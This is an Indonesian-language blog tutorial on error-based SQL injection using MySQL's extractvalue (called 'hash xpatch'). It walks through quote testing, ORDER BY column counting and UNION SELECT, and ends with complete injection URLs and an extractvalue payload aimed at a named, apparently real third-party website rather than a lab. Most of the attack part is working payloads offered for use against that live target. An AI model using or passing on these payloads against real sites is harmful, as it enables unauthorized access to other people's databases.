Tutorial SQL XPATCH
Maret 09, 2021
Tutorial SQL XPATCH
Oleh Akhsan
Assalamualaikum Hallo gan balik lagi sama gua kali ini gua akan memberikan tutorial sql xpatch
Bahan²=
-Chall
-hash xpatch
-internet pastinya
-hp/PC
-kopi and udud
Nggak ush basa basi langsung ke tutor aja
Di sini gw udh siapin live target untuk live target nya Klik Disini
Pertama kita ke web nya
Nah setelah itu kita tambahkan ' di depan param untuk mengecek bahwa web tersebut vuln terhadap SQL
Nah jika error seperti itu artinya vuln yah
Lanjut order by nya
Kalau udah kalian tinggal order by sampai error
order by 1--+-
order by 2--+-
order by 3--+-
Dan ada order by bypas nya:
order+by+1+asc--+-
Nah error di 55 kita lanjut union select
Contoh
http://www.thecus.com/product.php?PROD_ID=139'+AND+0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54--+-
Nah angka tersebut disebut angka togel Jika angka itu sudah muncul Kita tinggal pasang hash xpatch nya
Bang dapet hash xpacth nya dimana tenang gw kasih contohnya
+and%20extractvalue(0x0a,concat(0x0a,0x414B4853414E2047414E5353,0x203a3a20,(select%20@@version_comment)))
Itu termasuk hash xpatch yah guys nah sekarang kita tempel deh diangka 4 nya
Bang kok error sih?
Oke kita coba hapus union select dan angka angka 1,2,3 dan seterusnya
Contoh
http://www.thecus.com/product.php?PROD_ID=139%27+and%20extractvalue(0x0a,concat(0x0a,0x414B4853414E2047414E5353,0x203a3a20,(select%20@@version_comment)))--+-
Dan boom berhasil!!!
Oke segitu aja tutor dari gua semoga bermanfaat ya :)
#Happy Learn :)